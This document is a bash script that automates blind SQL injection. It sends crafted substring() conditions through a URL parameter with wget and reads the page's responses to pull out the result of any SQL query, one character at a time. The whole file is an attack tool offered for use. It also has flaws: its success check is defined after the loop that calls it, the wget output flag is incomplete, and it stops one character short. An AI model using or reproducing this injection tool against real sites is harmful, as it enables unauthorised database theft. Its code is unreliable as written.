blind.sh

#!/bin/bash

# Default values
URL=""
truestring=""
maxlength=""
query=""
ID=""

# Help panel function
function help_panel {
    echo "Usage: ./blind.sh [OPTIONS]"
    echo "Options:"
    echo "  -u, --url              The URL to query, f. ex: http://webpage.com/banddetails.php"
    echo "  -i, --id               The ID parameter to use in the URL, f. ex: ?band=20"
    echo "  -t, --truestring       The response that the web application shows when a request is successful, f. ex: We worked with them in the past"
    echo "  -m, --maxlength        The maximum length of the substring to extract, f. ex: 20"
    echo "  -q, --query            The SQL query to extract the substring from, see PentestMonkey SQL injection cheatsheets"
    echo "  -h, --help             Show this help panel"
}

# Parse command line arguments
while [[ $# -gt 0 ]]; do
    key="$1"
    case $key in
        -u|--url)
            URL="$2"
            shift # past argument
            shift # past value
            ;;
        -t|--truestring)
            truestring="$2"
            shift # past argument
            shift # past value
            ;;
        -m|--maxlength)
            maxlength="$2"
            shift # past argument
            shift # past value
            ;;
        -q|--query)
            query="$2"
            shift # past argument
            shift # past value
            ;;
        -i|--id)
            ID="$2"
            shift # past argument
            shift # past value
            ;;
        -h|--help)
            help_panel
            exit 0
            ;;
        *)    # unknown option
            echo "Unknown option: $key"
            help_panel
            exit 1
            ;;
    esac
done

# Check for missing arguments
if [[ -z $maxlength || -z $query || -z $URL || -z $truestring || -z $ID ]]; then
    echo "Missing arguments!"
    help_panel
    exit 1
fi

# Character set
charset=$(echo {0..9} {A..z} \. \: \, \; \- \_ \@)

# Extract the result
echo "Extracting the result for $query..."

result=""
for ((j=1;j<$maxlength;j+=1)); do
    nthchar=$j
    for i in $charset; do
        echo "Trying character number $nthchar: $i"
        response=$(wget "${URL}${ID}' and substring((${query}),${nthchar},1)='${i}" -q -O)
        if check_success "$response" "$truestring"; then
            echo "Character number $nthchar found: $i"
            result+=$i
            break
        fi
    done
done

echo "Result: $result"

# Check if the injection was successful
function check_success {
    response="$1"
    truestring="$2"
    if echo "$response" | grep -q "$truestring"; then
        return 0
    else
        return 1
    fi
}